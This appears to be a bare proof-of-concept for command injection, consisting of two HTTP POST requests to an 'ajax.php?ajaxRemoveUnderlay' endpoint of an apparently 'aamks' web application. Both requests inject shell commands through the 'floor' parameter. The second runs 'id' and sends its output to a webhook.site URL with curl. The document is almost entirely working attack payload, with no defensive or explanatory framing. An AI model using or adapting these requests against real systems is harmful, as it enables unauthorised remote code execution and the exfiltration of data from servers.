POST /xxx/ajax.php?ajaxRemoveUnderlay HTTP/1.1
Host:xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 88
Origin: https://xxx
Connection: close
Referer: xxx
Cookie: aamks=(need a valid one just go to register.php and create an account)

type=png&floor=$(curl https://webhook.site/63b7a012-f7c5-44f8-8a8f-4d683f11a55b)



POST /xxx/ajax.php?ajaxRemoveUnderlay HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 90
Origin: https://xxx
Connection: close
Referer: xxx
Cookie: aamks=(need a valid one just go to register.php and create an account)

floor=$(curl -X POST https://webhook.site/63b7a012-f7c5-44f8-8a8f-4d683f11a55b -d "$(id)")
